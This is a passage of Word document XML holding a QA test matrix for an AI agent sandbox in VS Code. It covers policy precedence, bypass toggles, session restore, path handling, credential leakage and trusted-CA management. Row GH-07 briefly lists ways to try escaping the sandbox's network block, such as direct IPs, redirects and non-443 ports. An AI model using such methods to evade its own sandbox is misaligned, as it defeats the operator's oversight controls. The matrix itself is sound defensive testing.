              </w:rPr>
              <w:t xml:space="preserve">allowOutbound: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + user network off; repeat for local network, dev-tool access, MCP/LSP sandboxing, bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Stricter user value wins for all 7 controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> shows the stricter value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> doesn't force a capability on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#338294</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; user </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowUnsandboxedCommands: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Bypass stays off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Checkbox false and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">editable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Old sessions after policy tightens</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#338294)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Create sessions with toggle Off / On / default + one with "Allow in this Session"; then deliver strict policy and resume</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Saved Off </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">can't</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> bypass; prior session approval </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">revoked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same; on policy removal, invalidated Off session is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> silently restored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Changing approval level</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#338294)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Mid-session switch Manual → Allow all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Sandbox stays on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Network block bypass attempts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#336970</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Outbound off; try alternate hostnames, subdomains, direct IPs, HTTP redirects, non-443 ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ All blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Error names the sandbox restriction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Path edge cases</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#336970)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Grant/deny invalid, missing, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">relative</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">space-containing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Understandable error; nothing escapes policy. Missing denied path → directory created (FS-11)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allowed child inside denied parent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#336970)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Deny </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, grant read on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\SbxTest\pub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Child readable · ⛔ rest of parent (more specific wins)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">No credentials in output</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#339641</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Run authenticated </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">gh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; search transcript/logs for token strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ No secrets shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Possible if a tool prints them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Session close / restore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#339641)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Close and restore a sandboxed session; send follow-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Still sandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Still sandboxed; policy report not auto-reopened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Editor window vs Agents window</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (vscode#339641, #339645)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same policy; compare state, prompts, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in both</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Identical state and wording; actions in one window don't affect sessions in the other</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Policy report freshness</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#336964</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Change one setting, new session, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Shows new effective policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ No model turn; readable paths; no ANSI codes or broken Markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Reports "not active"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Windows local-network notice</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#342467</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox on, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowLocalNetwork</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> off, new chat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Notice "Sandboxing requires access to local network. Allow"; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allow only opens Settings</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; dismiss is per session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No notice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">CA lifecycle</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#342465</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox: Manage Trusted CA</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → Install, Rotate, Remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox ca create</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
